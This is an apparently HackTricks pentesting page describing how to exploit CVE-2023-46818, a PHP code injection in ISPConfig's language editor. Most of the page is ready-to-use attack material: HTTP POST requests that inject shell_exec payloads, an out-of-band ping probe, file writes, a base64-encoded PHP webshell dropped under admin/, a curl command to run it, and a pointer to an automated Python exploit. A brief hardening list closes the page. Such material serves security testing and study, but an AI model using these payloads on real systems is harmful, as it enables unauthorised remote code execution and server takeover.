ISPConfig

Reading time: 4 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.

Key default paths:

  • Web root often at /var/www/ispconfig when served with php -S or via Apache/nginx.
  • Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).

Tip: If the panel is bound locally (e.g. 127.0.0.1:8080), forward it:

bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001

Language editor PHP code injection (CVE-2023-46818)

  • Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
  • Preconditions:
    • Login as the built-in superadmin account admin (other roles are not affected according to the vendor)
    • Language editor must be enabled: admin_allow_langedit=yes in /usr/local/ispconfig/security/security_settings.ini
  • Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context

References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

Manual exploitation flow

  1. Open/create a language file to obtain CSRF tokens

Send a first POST to initialize the form and parse the CSRF fields from the HTML response (csrf_id, csrf_key). Example request path: /admin/language_edit.php.

  1. Inject PHP via records[] and save

Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:

http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>

Out-of-band test (observe ICMP):

http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
  1. Write files and drop a webshell

Use file_put_contents to create a file under a web-reachable path (e.g., admin/):

http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>

Then write a simple webshell using base64 to avoid bad characters in the POST body:

http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>

Use it:

bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'

If PHP is executed as root (e.g., via php -S 127.0.0.1:8080 started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.

Python PoC

A ready-to-use exploit automates token handling and payload delivery:

Example run:

bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>

Hardening

  • Upgrade to 3.2.11p1 or later
  • Disable the language editor unless strictly needed:
admin_allow_langedit=no
  • Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
  • Enforce strong authentication for the built-in admin account

References

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks